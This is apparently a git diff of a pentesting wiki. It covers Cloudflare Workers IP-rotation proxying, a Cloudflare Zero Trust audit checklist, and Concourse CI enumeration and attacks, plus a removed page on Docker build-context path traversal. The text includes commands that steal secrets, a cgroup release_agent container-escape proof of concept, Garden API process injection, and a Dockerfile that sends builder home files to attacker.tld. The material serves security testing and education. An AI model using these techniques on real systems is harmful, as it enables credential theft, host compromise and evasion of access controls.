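    base = "https://your-worker.account.workers.dev"  # hypothetical Worker endpoint
    print(proxied_url(base, "https://httpbin.org/ip"))
```

Either form can then be handed to any HTTP client, keeping the real upstream out of the request line your tooling sees.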
**`X-Forwarded-For` control**
If the Worker supports `X-My-X-Forwarded-For`, you can influence the upstream `X-Forwarded-For` value:
```bash
curl -H "X-My-X-Forwarded-For: 203.0.113.10" \
"https://your-worker.account.workers.dev?url=https://httpbin.org/headers"
```
**Programmatic usage**
Use the FlareProx library to create/list/test endpoints and route requests from Python.
<details>
<summary>Python example: send a POST request through a random Worker endpoint</summary>
```python
#!/usr/bin/env python3
from flareprox import FlareProx, FlareProxError
import json
# Initialize
flareprox = FlareProx(config_file="flareprox.json")
if not flareprox.is_configured:
print("FlareProx not configured. Run: python3 flareprox.py config")
exit(1)
# Ensure endpoints exist
endpoints = flareprox.sync_endpoints()
if not endpoints:
print("Creating proxy endpoints...")
flareprox.create_proxies(count=2)
# Make a POST request through a random endpoint
try:
post_data = json.dumps({
"username": "testuser",
"message": "Hello from FlareProx!",
"timestamp": "2025-01-01T12:00:00Z"
})
headers = {
"Content-Type": "application/json",
"User-Agent": "FlareProx-Client/1.0"
}
response = flareprox.redirect_request(
target_url="https://httpbin.org/post",
method="POST",
headers=headers,
data=post_data
)
if response.status_code == 200:
result = response.json()
print("✓ POST successful via FlareProx")
print(f"Origin IP: {result.get('origin', 'unknown')}")
print(f"Posted data: {result.get('json', {})}")
else:
print(f"Request failed with status: {response.status_code}")
except FlareProxError as e:
print(f"FlareProx error: {e}")
except Exception as e:
print(f"Request error: {e}")
```
</details>
**Burp/Scanner integration**
- Point your tooling (e.g., Burp Suite) at the Worker URL.
- Supply the real upstream via ?url= or X-Target-URL.
- HTTP semantics (methods/headers/body) are preserved while your source IP stays hidden behind Cloudflare.
**Operational notes and limitations**
- The Cloudflare Workers Free plan allows roughly 100,000 requests per account per day; use multiple endpoints to spread traffic if needed.
- Workers run on Cloudflare's network; many targets will only see Cloudflare IPs/ASN, which may bypass simple IP allow/deny lists or geolocation-based heuristics.
- Use responsibly and only with authorization. Respect ToS and robots.txt.
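The endpoint-rotation idea can be sketched as a simple round-robin selector; the endpoint URLs are hypothetical and FlareProx's own selection logic may differ:

```python
import itertools

class EndpointRotator:
    """Round-robin over several Worker endpoints so no single endpoint
    burns through the daily free-tier quota alone."""
    def __init__(self, endpoints):
        # itertools.cycle yields endpoints forever in order
        self._cycle = itertools.cycle(endpoints)

    def next_url(self, target_url: str) -> str:
        base = next(self._cycle)
        return f"{base}?url={target_url}"

rotator = EndpointRotator([
    "https://proxy-1.account.workers.dev",  # placeholder endpoints
    "https://proxy-2.account.workers.dev",
])
for _ in range(3):
    print(rotator.next_url("https://httpbin.org/ip"))
```

Each successive request goes out through the next endpoint, wrapping around once the list is exhausted.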
## References
- [FlareProx (Cloudflare Workers pass-through/rotation)](https://github.com/MrTurvey/flareprox)
- [Cloudflare Workers fetch() API](https://developers.cloudflare.com/workers/runtime-apis/fetch/)
- [Cloudflare Workers pricing and free tier](https://developers.cloudflare.com/workers/platform/pricing/)
- [FireProx (AWS API Gateway)](https://github.com/ustayready/fireprox)
{{#include ../../banners/hacktricks-training.md}}

View File

@@ -2,43 +2,43 @@
{{#include ../../banners/hacktricks-training.md}}
In a **Cloudflare Zero Trust Network** account there are some **settings and services** that can be configured. In this page we are going to **analyze the security related settings of each section:**
<figure><img src="../../images/image (206).png" alt=""><figcaption></figcaption></figure>
### Analytics
- [ ] Useful to **get to know the environment**
### **Gateway**
- [ ] In **`Policies`** it's possible to generate policies to **restrict** by **DNS**, **network** or **HTTP** request who can access applications.
- If used, **policies** could be created to **restrict** the access to malicious sites.
- This is **only relevant if a gateway is being used**, if not, there is no reason to create defensive policies.
### Access
#### Applications
On each application:
- [ ] Check **who** can access the application in the **Policies** and check that **only** the **users** that **need access** to the application can access it.
- To allow access **`Access Groups`** are going to be used (and **additional rules** can be set also)
- [ ] Check the **available identity providers** and make sure they **aren't too open**
- [ ] In **`Settings`**:
- [ ] Check **CORS isn't enabled** (if it's enabled, check it's **secure** and it isn't allowing everything)
- [ ] Cookies should have the **Strict Same-Site** attribute and **HTTP Only**, and **binding cookie** should be **enabled** if the application is HTTP.
- [ ] Consider also enabling **Browser rendering** for better **protection**. More info about [**remote browser isolation here**](https://blog.cloudflare.com/cloudflare-and-remote-browser-isolation/).
#### **Access Groups**
- [ ] Check that the access groups generated are **correctly restricted** to the users they should allow.
- [ ] It's especially important to check that the **default access group isn't very open** (it's **not allowing too many people**) as by **default** anyone in that **group** is going to be able to **access applications**.
- Note that it's possible to give **access** to **EVERYONE** and other **very open policies** that aren't recommended unless 100% necessary.
#### Service Auth
- [ ] Check that all service tokens **expire in 1 year or less**
#### Tunnels
@@ -50,12 +50,15 @@ TODO
### Logs
- [ ] You could search for **unexpected actions** from users
### Settings
- [ ] Check the **plan type**
- [ ] It's possible to see the **credit card owner's name**, **last 4 digits**, **expiration** date and **address**
- [ ] It's recommended to **add a User Seat Expiration** to remove users that don't really use this service
{{#include ../../banners/hacktricks-training.md}}

View File

@@ -2,32 +2,35 @@
{{#include ../../banners/hacktricks-training.md}}
## Basic Information
Concourse allows you to **build pipelines** to automatically run tests, actions and build images whenever you need it (time based, when something happens...)
## Concourse Architecture
Learn how the concourse environment is structured in:
{{#ref}}
concourse-architecture.md
{{#endref}}
## Concourse Lab
Learn how you can run a concourse environment locally to do your own tests in:
{{#ref}}
concourse-lab-creation.md
{{#endref}}
## Enumerate & Attack Concourse
Learn how you can enumerate the concourse environment and abuse it in:
{{#ref}}
concourse-enumeration-and-attacks.md
{{#endref}}
{{#include ../../banners/hacktricks-training.md}}

View File

@@ -4,7 +4,9 @@
## Concourse Architecture
[**Relevant data from Concourse documentation:**](https://concourse-ci.org/internals.html)
### Architecture
@@ -12,27 +14,29 @@
#### ATC: web UI & build scheduler
The ATC is the heart of Concourse. It runs the **web UI and API** and is responsible for all pipeline **scheduling**. It **connects to PostgreSQL**, which it uses to store pipeline data (including build logs).
The [checker](https://concourse-ci.org/checker.html)'s responsibility is to continuously check for new versions of resources. The [scheduler](https://concourse-ci.org/scheduler.html) is responsible for scheduling builds for a job and the [build tracker](https://concourse-ci.org/build-tracker.html) is responsible for running any scheduled builds. The [garbage collector](https://concourse-ci.org/garbage-collector.html) is the cleanup mechanism for removing any unused or outdated objects, such as containers and volumes.
#### TSA: worker registration & forwarding
The TSA is a **custom-built SSH server** that is used solely for securely **registering** [**workers**](https://concourse-ci.org/internals.html#architecture-worker) with the [ATC](https://concourse-ci.org/internals.html#component-atc).
The TSA by **default listens on port `2222`**, and is usually colocated with the [ATC](https://concourse-ci.org/internals.html#component-atc) and sitting behind a load balancer.
The **TSA implements a CLI over the SSH connection,** supporting [**these commands**](https://concourse-ci.org/internals.html#component-tsa).
#### Workers
In order to execute tasks concourse must have some workers. These workers **register themselves** via the [TSA](https://concourse-ci.org/internals.html#component-tsa) and run the services [**Garden**](https://github.com/cloudfoundry-incubator/garden) and [**Baggageclaim**](https://github.com/concourse/baggageclaim).
- **Garden**: This is the **Container Management API**, usually run on **port 7777** via **HTTP**.
- **Baggageclaim**: This is the **Volume Management API**, usually run on **port 7788** via **HTTP**.
## References
- [https://concourse-ci.org/internals.html](https://concourse-ci.org/internals.html)
{{#include ../../banners/hacktricks-training.md}}

View File

@@ -6,47 +6,49 @@
### User Roles & Permissions
Concourse comes with five roles:
- _Concourse_ **Admin**: This role is only given to owners of the **main team** (default initial concourse team). Admins can **configure other teams** (e.g.: `fly set-team`, `fly destroy-team`...). The permissions of this role cannot be affected by RBAC.
- **owner**: Team owners can **modify everything within the team**.
- **member**: Team members can **read and write** within the **team's assets** but cannot modify the team settings.
- **pipeline-operator**: Pipeline operators can perform **pipeline operations** such as triggering builds and pinning resources, however they cannot update pipeline configurations.
- **viewer**: Team viewers have **"read-only" access to a team** and its pipelines.
> [!NOTE]
> Moreover, the **permissions of the roles owner, member, pipeline-operator and viewer can be modified** by configuring RBAC (more specifically, configuring their actions). Read more about it in: [https://concourse-ci.org/user-roles.html](https://concourse-ci.org/user-roles.html)
Note that Concourse **groups pipelines inside Teams**. Therefore users belonging to a Team will be able to manage those pipelines and **several Teams** might exist. A user can belong to several Teams and have different permissions inside each of them.
### Vars & Credential Manager
In the YAML configs you can configure values using the syntax `((_source-name_:_secret-path_._secret-field_))`.\
[From the docs:](https://concourse-ci.org/vars.html#var-syntax) The **source-name is optional**, and if omitted, the [cluster-wide credential manager](https://concourse-ci.org/vars.html#cluster-wide-credential-manager) will be used, or the value may be provided [statically](https://concourse-ci.org/vars.html#static-vars).\
The optional _**secret-field**_ specifies a field on the fetched secret to read. If omitted, the credential manager may choose to read a 'default field' from the fetched credential if the field exists.\
Moreover, the _**secret-path**_ and _**secret-field**_ may be surrounded by double quotes `"..."` if they **contain special characters** like `.` and `:`. For instance, `((source:"my.secret"."field:1"))` will set the _secret-path_ to `my.secret` and the _secret-field_ to `field:1`.
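As a rough illustration of those quoting rules (a sketch, not Concourse's official parser), the reference can be split like this:

```python
def parse_var(expr: str):
    """Split a ((source-name:secret-path.secret-field)) reference into its
    parts, honoring double-quoted segments that contain '.' or ':'."""
    inner = expr.strip()
    if inner.startswith("((") and inner.endswith("))"):
        inner = inner[2:-2]
    parts, seps, buf, quoted = [], [], "", False
    for ch in inner:
        if ch == '"':
            quoted = not quoted          # toggle quoted mode, drop the quote itself
        elif ch in ':.' and not quoted:  # unquoted separators end a segment
            parts.append(buf)
            seps.append(ch)
            buf = ""
        else:
            buf += ch
    parts.append(buf)
    source = None
    if seps and seps[0] == ":":          # segment before the first ':' is the source
        source = parts.pop(0)
        seps.pop(0)
    path = parts.pop(0)
    field = parts.pop(0) if parts else None
    return source, path, field

print(parse_var('((source:"my.secret"."field:1"))'))  # → ('source', 'my.secret', 'field:1')
```

This reproduces the documented example: the quoted `.` and `:` stay inside the path and field instead of acting as separators.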
#### Static Vars
Static vars can be specified in **task steps**:
```yaml
- task: unit-1.13
  file: booklit/ci/unit.yml
  vars: { tag: 1.13 }
```
Or using the following `fly` **arguments**:
- `-v` or `--var` `NAME=VALUE` sets the string `VALUE` as the value for the var `NAME`.
- `-y` or `--yaml-var` `NAME=VALUE` parses `VALUE` as YAML and sets it as the value for the var `NAME`.
- `-i` or `--instance-var` `NAME=VALUE` parses `VALUE` as YAML and sets it as the value for the instance var `NAME`. See [Grouping Pipelines](https://concourse-ci.org/instanced-pipelines.html) to learn more about instance vars.
- `-l` or `--load-vars-from` `FILE` loads `FILE`, a YAML document containing a mapping of var names to values, and sets them all.
#### Credential Management
There are different ways a **Credential Manager can be specified** in a pipeline, read how in [https://concourse-ci.org/creds.html](https://concourse-ci.org/creds.html).\
Moreover, Concourse supports different credential managers:
- [The Vault credential manager](https://concourse-ci.org/vault-credential-manager.html)
- [The CredHub credential manager](https://concourse-ci.org/credhub-credential-manager.html)
@@ -59,151 +61,160 @@ vars: { tag: 1.13 }
- [Retrying failed fetches](https://concourse-ci.org/creds-retry-logic.html)
> [!CAUTION]
> Note that if you have some kind of **write access to Concourse** you can create jobs to **exfiltrate those secrets** as Concourse needs to be able to access them.
### Concourse Enumeration
In order to enumerate a concourse environment you first need to **gather valid credentials** or to find an **authenticated token**, probably in a `.flyrc` config file.
#### Login and Current User enum
- To login you need to know the **endpoint**, the **team name** (default is `main`) and a **team the user belongs to**:
- `fly --target example login --team-name my-team --concourse-url https://ci.example.com [--insecure] [--client-cert=./path --client-key=./path]`
- Get configured **targets**:
- `fly targets`
- Check if the configured **target connection** is still **valid**:
- `fly -t <target> status`
- Get the **role** of the user against the indicated target:
- `fly -t <target> userinfo`
> [!NOTE]
> Note that the **API token** is **saved** in `$HOME/.flyrc` by default; when looting a machine you could find the credentials there.
#### Teams & Users
- Get a list of the Teams
- `fly -t <target> teams`
- Get roles inside a team
- `fly -t <target> get-team -n <team-name>`
- Get a list of users
- `fly -t <target> active-users`
#### Pipelines
- **List** pipelines:
- `fly -t <target> pipelines -a`
- **Get** pipeline yaml (**sensitive information** might be found in the definition):
- `fly -t <target> get-pipeline -p <pipeline-name>`
- Get all pipeline **config declared vars**:
- `for pipename in $(fly -t <target> pipelines | grep -Ev "^id" | awk '{print $2}'); do echo $pipename; fly -t <target> get-pipeline -p $pipename -j | grep -Eo '"vars":[^}]+'; done`
- Get all the **pipeline secret names used** (if you can create/modify a job or hijack a container you could exfiltrate them):
```bash
rm /tmp/secrets.txt;
for pipename in $(fly -t onelogin pipelines | grep -Ev "^id" | awk '{print $2}'); do
  echo $pipename;
  fly -t onelogin get-pipeline -p $pipename | grep -Eo '\(\(.*\)\)' | sort | uniq | tee -a /tmp/secrets.txt;
  echo "";
done
echo ""
echo "ALL SECRETS"
cat /tmp/secrets.txt | sort | uniq
rm /tmp/secrets.txt
```
#### Containers & Workers
- List **workers**:
- `fly -t <target> workers`
- List **containers**:
- `fly -t <target> containers`
- List **builds** (to see what is running):
- `fly -t <target> builds`
### Concourse Attacks
#### Credentials Brute-Force
- admin:admin
- test:test
#### Secrets and params enumeration
In the previous section we saw how you can **get all the secret names and vars** used by the pipeline. The **vars might contain sensitive info** and the names of the **secrets will be useful later to try to steal** them.
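The same secret-name collection can be done offline on saved pipeline YAML, mirroring the `grep -Eo '\(\(.*\)\)'` one-liner used earlier:

```python
import re

def secret_refs(pipeline_yaml: str):
    """Collect the distinct ((...)) references appearing in a pipeline
    definition, like the grep-based shell loop but as a reusable function."""
    return sorted(set(re.findall(r"\(\([^)]+\)\)", pipeline_yaml)))

# Sample pipeline fragment with a repeated reference to show deduplication
sample = """
params:
  SUPER_SECRET: ((super.secret))
  TOKEN: ((vault:ci.token))
  AGAIN: ((super.secret))
"""
print(secret_refs(sample))  # → ['((super.secret))', '((vault:ci.token))']
```

Feeding it the output of `fly get-pipeline -p <name>` for every pipeline gives the same deduplicated secret list as the shell version.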
#### Session inside running or recently run container
If you have enough privileges (**member role or more**) you will be able to **list pipelines and roles** and just get a **session inside** the `<pipeline>/<job>` **container** using:
```bash
fly -t tutorial intercept --job pipeline-name/job-name
fly -t tutorial intercept # To be presented a prompt with all the options
```
With these permissions you might be able to:
- **Steal the secrets** inside the **container**
- Try to **escape** to the node
- Enumerate/Abuse **cloud metadata** endpoint (from the pod and from the node, if possible)
#### Pipeline Creation/Modification
If you have enough privileges (**member role or more**) you will be able to **create/modify new pipelines.** Check this example:
```yaml
jobs:
- name: simple
  plan:
  - task: simple-task
    privileged: true
    config:
      # Tells Concourse which type of worker this task should run on
      platform: linux
      image_resource:
        type: registry-image
        source:
          repository: busybox # images are pulled from docker hub by default
      run:
        path: sh
        args:
        - -cx
        - |
          echo "$SUPER_SECRET"
          sleep 1000
    params:
      SUPER_SECRET: ((super.secret))
```
With the **modification/creation** of a new pipeline you will be able to:
- **Steal** the **secrets** (via echoing them out or getting inside the container and running `env`)
- **Escape** to the **node** (by giving you enough privileges - `privileged: true`)
- Enumerate/Abuse **cloud metadata** endpoint (from the pod and from the node)
- **Delete** the created pipeline
#### Execute Custom Task
This is similar to the previous method, but instead of modifying/creating a whole new pipeline you can **just execute a custom task** (which will probably be much **stealthier**):
```yaml
# For more task_config options check https://concourse-ci.org/tasks.html
platform: linux
image_resource:
  type: registry-image
  source:
    repository: ubuntu
run:
  path: sh
  args:
  - -cx
  - |
    env
    sleep 1000
params:
  SUPER_SECRET: ((super.secret))
```
```bash
fly -t tutorial execute --privileged --config task_config.yml
```
#### Escaping to the node from a privileged task
In the previous sections we saw how to **execute a privileged task with concourse**. This won't give the container exactly the same access as the privileged flag in a docker container. For example, you won't see the node filesystem device in /dev, so the escape could be more "complex".
In the following PoC we are going to use the release_agent to escape with some small modifications:
```bash
# Mounts the RDMA cgroup controller and create a child cgroup
# If you're following along and get "mount: /tmp/cgrp: special device cgroup does not exist"
@@ -261,12 +272,14 @@ sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
# Reads the output
cat /output
```
> [!WARNING]
> As you might have noticed this is just a [**regular release_agent escape**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/concourse-security/broken-reference/README.md) just modifying the path of the cmd in the node.
#### Escaping to the node from a Worker container
A regular release_agent escape with a minor modification is enough for this:
```bash
mkdir /tmp/cgrp && mount -t cgroup -o memory cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
@@ -293,11 +306,13 @@ sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
# Reads the output
cat /output
```
#### Escaping to the node from the Web container
Even if the web container has some defenses disabled it's **not running as a common privileged container** (for example, you **cannot** **mount** and the **capabilities** are very **limited**, so all the easy ways to escape from the container are useless).
However, it stores **local credentials in clear text**:
```bash
cat /concourse-auth/local-users
test:test
@@ -306,9 +321,11 @@ env | grep -i local_user
CONCOURSE_MAIN_TEAM_LOCAL_USER=test
CONCOURSE_ADD_LOCAL_USER=test:test
```
You could use these credentials to **login against the web server** and **create a privileged container and escape to the node**.
In the environment you can also find information to **access the postgresql** instance that concourse uses (address, **username**, **password** and database among other info):
```bash
env | grep -i postg
CONCOURSE_RELEASE_POSTGRESQL_PORT_5432_TCP_ADDR=10.107.191.238
@@ -329,35 +346,39 @@ select * from refresh_token;
select * from teams; #Change the permissions of the users in the teams
select * from users;
```
#### Abusing Garden Service - Not a real Attack
> [!WARNING]
> These are just some interesting notes about the service, but because it's only listening on localhost, these notes won't present any impact we haven't already exploited before
By default each concourse worker will be running a [**Garden**](https://github.com/cloudfoundry/garden) service in port 7777. This service is used by the Web master to indicate the worker **what it needs to execute** (download the image and run each task). This sounds pretty good for an attacker, but there are some nice protections:
- It's just **exposed locally** (127.0.0.1) and I think when the worker authenticates against the Web with the special SSH service, a tunnel is created so the web server can **talk to each Garden service** inside each worker.
- The web server is **monitoring the running containers every few seconds**, and **unexpected** containers are **deleted**. So if you want to **run a custom container** you need to **tamper** with the **communication** between the web server and the garden service.
Concourse workers run with high container privileges:
```
Container Runtime: docker
Has Namespaces:
  pid: true
  user: false
AppArmor Profile: kernel
Capabilities:
  BOUNDING -> chown dac_override dac_read_search fowner fsetid kill setgid setuid setpcap linux_immutable net_bind_service net_broadcast net_admin net_raw ipc_lock ipc_owner sys_module sys_rawio sys_chroot sys_ptrace sys_pacct sys_admin sys_boot sys_nice sys_resource sys_time sys_tty_config mknod lease audit_write audit_control setfcap mac_override mac_admin syslog wake_alarm block_suspend audit_read
Seccomp: disabled
```
However, techniques like **mounting** the /dev device of the node or release_agent **won't work** (as the real device with the filesystem of the node isn't accessible, only a virtual one). We cannot access the processes of the node, so escaping from the node without kernel exploits gets complicated.
> [!NOTE]
> In the previous section we saw how to escape from a privileged container, so if we can **execute** commands in a **privileged container** created by the **current** **worker**, we could **escape to the node**.
Note that playing with concourse I noted that when a new container is spawned to run something, the container processes are accessible from the worker container, so it's like a container creating a new container inside of it.
**Getting inside a running privileged container**
```bash
# Get current container
curl 127.0.0.1:7777/containers
@@ -370,26 +391,30 @@ curl 127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/properties
# Execute a new process inside a container
## In this case "sleep 20000" will be executed in the container with handler ac793559-7f53-4efc-6591-0171a0391e53
wget -v -O- --post-data='{"id":"task2","path":"sh","args":["-cx","sleep 20000"],"dir":"/tmp/build/e55deab7","rlimits":{},"tty":{"window_size":{"columns":500,"rows":500}},"image":{}}' \
  --header='Content-Type:application/json' \
  'http://127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/processes'
# OR instead of doing all of that, you could just get into the ns of the process of the privileged container
nsenter --target 76011 --mount --uts --ipc --net --pid -- sh
```
**Creating a new privileged container**
You can very easily create a new container (just use a random UID) and execute something on it:
```bash
curl -X POST http://127.0.0.1:7777/containers \
  -H 'Content-Type: application/json' \
  -d '{"handle":"123ae8fc-47ed-4eab-6b2e-123458880690","rootfs":"raw:///concourse-work-dir/volumes/live/ec172ffd-31b8-419c-4ab6-89504de17196/volume","image":{},"bind_mounts":[{"src_path":"/concourse-work-dir/volumes/live/9f367605-c9f0-405b-7756-9c113eba11f1/volume","dst_path":"/scratch","mode":1}],"properties":{"user":""},"env":["BUILD_ID=28","BUILD_NAME=24","BUILD_TEAM_ID=1","BUILD_TEAM_NAME=main","ATC_EXTERNAL_URL=http://127.0.0.1:8080"],"limits":{"bandwidth_limits":{},"cpu_limits":{},"disk_limits":{},"memory_limits":{},"pid_limits":{}}}'
# Wget will be stuck there as long as the process is being executed
wget -v -O- --post-data='{"id":"task2","path":"sh","args":["-cx","sleep 20000"],"dir":"/tmp/build/e55deab7","rlimits":{},"tty":{"window_size":{"columns":500,"rows":500}},"image":{}}' \
  --header='Content-Type:application/json' \
  'http://127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/processes'
```
However, the web server checks every few seconds which containers are running, and if an unexpected one is discovered, it will be deleted. As the communication occurs over HTTP, you could tamper with the communication to avoid the deletion of unexpected containers:
```
GET /containers HTTP/1.1.
Host: 127.0.0.1:7777.
@@ -411,8 +436,11 @@ Host: 127.0.0.1:7777.
User-Agent: Go-http-client/1.1.
Accept-Encoding: gzip.
```
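One way to keep a rogue container alive is to interpose on that HTTP channel and strip the rogue handle from the responses the web component reads. Below is a minimal sketch of just the filtering logic, assuming the `/containers` endpoint returns a JSON object with a `handles` list (verify the exact response shape against your instance):

```python
import json

def hide_handle(body: bytes, rogue: str) -> bytes:
    """Drop a rogue container handle from a /containers JSON response.

    Assumes a Garden-style body like {"handles": ["h1", "h2", ...]};
    anything else is passed through unchanged.
    """
    data = json.loads(body)
    if isinstance(data.get("handles"), list):
        data["handles"] = [h for h in data["handles"] if h != rogue]
    return json.dumps(data).encode()

# The web component would no longer see the injected container
resp = b'{"handles":["ac793559-7f53-4efc-6591-0171a0391e53","123ae8fc-47ed-4eab-6b2e-123458880690"]}'
print(hide_handle(resp, "123ae8fc-47ed-4eab-6b2e-123458880690").decode())
```

This function would be wired into whatever interposer you place between the web and worker components (a small local proxy plus traffic redirection); the exact plumbing depends on the deployment.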
## References
- [https://concourse-ci.org/vars.html](https://concourse-ci.org/vars.html)
{{#include ../../banners/hacktricks-training.md}}

View File

@@ -2,22 +2,25 @@
{{#include ../../banners/hacktricks-training.md}}
## Testing Environment
### Running Concourse
#### With Docker-Compose
This docker-compose file simplifies the installation to run some tests with Concourse:
```bash
wget https://raw.githubusercontent.com/starkandwayne/concourse-tutorial/master/docker-compose.yml
docker-compose up -d
```
You can download the `fly` command line for your OS from the web at `127.0.0.1:8080`
#### With Kubernetes (Recommended)
You can easily deploy concourse in **Kubernetes** (in **minikube** for example) using the helm-chart: [**concourse-chart**](https://github.com/concourse/concourse-chart).
```bash
brew install helm
helm repo add concourse https://concourse-charts.storage.googleapis.com/
@@ -28,90 +31,94 @@ helm install concourse-release concourse/concourse
# If you need to delete it
helm delete concourse-release
```
After generating the Concourse environment, you could create a secret and grant the SA running in the Concourse web pod access to K8s secrets:
```yaml
echo 'apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: read-secrets
name: read-secrets
rules:
- apiGroups: [""]
resources: ["secrets"]
verbs: ["get"]
resources: ["secrets"]
verbs: ["get"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
name: read-secrets-concourse
name: read-secrets-concourse
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: read-secrets
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: read-secrets
subjects:
- kind: ServiceAccount
name: concourse-release-web
namespace: default
name: concourse-release-web
namespace: default
---
apiVersion: v1
kind: Secret
metadata:
name: super
namespace: concourse-release-main
name: super
namespace: concourse-release-main
type: Opaque
data:
secret: MWYyZDFlMmU2N2Rm
secret: MWYyZDFlMmU2N2Rm
' | kubectl apply -f -
```
### Create Pipeline
A pipeline is made of a list of [Jobs](https://concourse-ci.org/jobs.html) which contains an ordered list of [Steps](https://concourse-ci.org/steps.html).
### Steps
Several different types of steps can be used:
- **the** [**`task` step**](https://concourse-ci.org/task-step.html) **runs a** [**task**](https://concourse-ci.org/tasks.html)
- the [`get` step](https://concourse-ci.org/get-step.html) fetches a [resource](https://concourse-ci.org/resources.html)
- the [`put` step](https://concourse-ci.org/put-step.html) updates a [resource](https://concourse-ci.org/resources.html)
- the [`set_pipeline` step](https://concourse-ci.org/set-pipeline-step.html) configures a [pipeline](https://concourse-ci.org/pipelines.html)
- the [`load_var` step](https://concourse-ci.org/load-var-step.html) loads a value into a [local var](https://concourse-ci.org/vars.html#local-vars)
- the [`in_parallel` step](https://concourse-ci.org/in-parallel-step.html) runs steps in parallel
- the [`do` step](https://concourse-ci.org/do-step.html) runs steps in sequence
- the [`across` step modifier](https://concourse-ci.org/across-step.html#schema.across) runs a step multiple times; once for each combination of variable values
- the [`try` step](https://concourse-ci.org/try-step.html) attempts to run a step and succeeds even if the step fails
Each [step](https://concourse-ci.org/steps.html) in a [job plan](https://concourse-ci.org/jobs.html#schema.job.plan) runs in its **own container**. You can run anything you want inside the container _(i.e. run my tests, run this bash script, build this image, etc.)_. So if you have a job with five steps, Concourse will create five containers, one for each step.
Therefore, it's possible to indicate the type of container each step needs to be run in.
### Simple Pipeline Example
```yaml
jobs:
- name: simple
  plan:
  - task: simple-task
    privileged: true
    config:
      # Tells Concourse which type of worker this task should run on
      platform: linux
      image_resource:
        type: registry-image
        source:
          repository: busybox # images are pulled from docker hub by default
      run:
        path: sh
        args:
        - -cx
        - |
          sleep 1000
          echo "$SUPER_SECRET"
      params:
        SUPER_SECRET: ((super.secret))
```
```bash
@@ -123,21 +130,25 @@ fly -t tutorial trigger-job --job pipe-name/simple --watch
# From another console
fly -t tutorial intercept --job pipe-name/simple
```
Check **127.0.0.1:8080** to see the pipeline flow.
### Bash script with output/input pipeline
It's possible to **save the results of one task in a file**, declare it as an output, and then declare the input of the next task as the output of the previous one. What Concourse does is **mount the output directory of the previous task into the new task, so you can access the files created by the previous task**.
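A minimal sketch of that mechanism, using hypothetical task and directory names: the first task declares an `outputs:` entry and the second consumes the same name as `inputs:`.

```yaml
jobs:
- name: pass-a-file
  plan:
  - task: produce
    config:
      platform: linux
      image_resource:
        type: registry-image
        source:
          repository: busybox
      outputs:
      - name: shared            # directory Concourse will carry forward
      run:
        path: sh
        args: ["-c", "echo hello > shared/result.txt"]
  - task: consume
    config:
      platform: linux
      image_resource:
        type: registry-image
        source:
          repository: busybox
      inputs:
      - name: shared            # same directory, mounted from the previous task
      run:
        path: sh
        args: ["-c", "cat shared/result.txt"]
```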
### Triggers
You don't need to trigger jobs manually every time you want to run them; you can also configure them to trigger automatically when:
- Some time passes: [Time resource](https://github.com/concourse/time-resource/)
- On new commits to the main branch: [Git resource](https://github.com/concourse/git-resource)
- New PRs: [Github-PR resource](https://github.com/telia-oss/github-pr-resource)
- Fetch or push the latest image of your app: [Registry-image resource](https://github.com/concourse/registry-image-resource/)
Check a YAML pipeline example that triggers on new commits to master in [https://concourse-ci.org/tutorial-resources.html](https://concourse-ci.org/tutorial-resources.html)
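As an illustrative sketch (the resource URI is a placeholder), a job that triggers on new commits via the Git resource looks like:

```yaml
resources:
- name: repo
  type: git
  source:
    uri: https://github.com/<org>/<repo>.git
    branch: master

jobs:
- name: build-on-commit
  plan:
  - get: repo
    trigger: true               # run this job automatically on new versions
  - task: build
    config:
      platform: linux
      image_resource:
        type: registry-image
        source:
          repository: busybox
      inputs:
      - name: repo
      run:
        path: sh
        args: ["-c", "ls repo"]
```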
{{#include ../../banners/hacktricks-training.md}}

View File

@@ -1,101 +0,0 @@
# Abusing Docker Build Context on Hosted Builders (Path Traversal, Exfil, and Cloud Pivot)
{{#include ../banners/hacktricks-training.md}}
## TL;DR
If a CI/CD platform or hosted builder lets contributors specify the Docker build context path and Dockerfile path, it is often possible to set the context to a parent directory (e.g. "..") so that host files become part of the build context. An attacker-controlled Dockerfile can then COPY and exfiltrate secrets located in the builder user's home directory (e.g. ~/.docker/config.json). Stolen registry tokens may also be valid against the provider's control-plane APIs, enabling org-wide RCE.
## Attack Surface
Many hosted builder/registry services do roughly the following when building user-submitted images:
- Read a repo-level config containing:
- build context path (sent to the Docker daemon)
- Dockerfile path relative to that context
- Copy the specified build context directory and Dockerfile to the Docker daemon
- Build the image and run it as a hosted service
If the platform does not canonicalize and restrict the build context, a user can point it outside the repository (path traversal), so any host file readable by the build user becomes part of the build context and is reachable from the Dockerfile via COPY.
Common practical constraints:
- The Dockerfile must reside inside the selected context path, and its path must be known in advance.
- The build user must have read access to the files included in the context; special device files may break the copy process.
## PoC: Path traversal via Docker build context
Example malicious server config declaring a Dockerfile within the parent directory context:
```yaml
runtime: "container"
build:
dockerfile: "test/Dockerfile" # Must reside inside the final context
dockerBuildPath: ".." # Path traversal to builder user $HOME
startCommand:
type: "http"
configSchema:
type: "object"
properties:
apiKey:
type: "string"
required: ["apiKey"]
exampleConfig:
apiKey: "sk-example123"
```
Notes:
- Using '..' typically resolves to the builder user's home directory (e.g. /home/builder), which usually contains sensitive files.
- Place the Dockerfile under the repository's directory name (e.g. repo "test" → test/Dockerfile) so it stays inside the expanded parent context.
## PoC: Dockerfile to ingest and exfiltrate the host context
```dockerfile
FROM alpine
RUN apk add --no-cache curl
RUN mkdir /data
COPY . /data # Copies the entire build context (now the builder's $HOME)
RUN curl -si https://attacker.tld/?d=$(find /data | base64 -w 0)
```
Typical targets recovered from $HOME:
- ~/.docker/config.json (registry auths/tokens)
- Other cloud/CLI caches and configs (e.g. ~/.fly, ~/.kube, ~/.aws, ~/.config/*)
Tip: even if the repository ships a .dockerignore, the vulnerable platform-side context selection still decides what is sent to the daemon. If the platform copies the chosen path to the daemon before evaluating your repo's .dockerignore, host files can still be exposed.
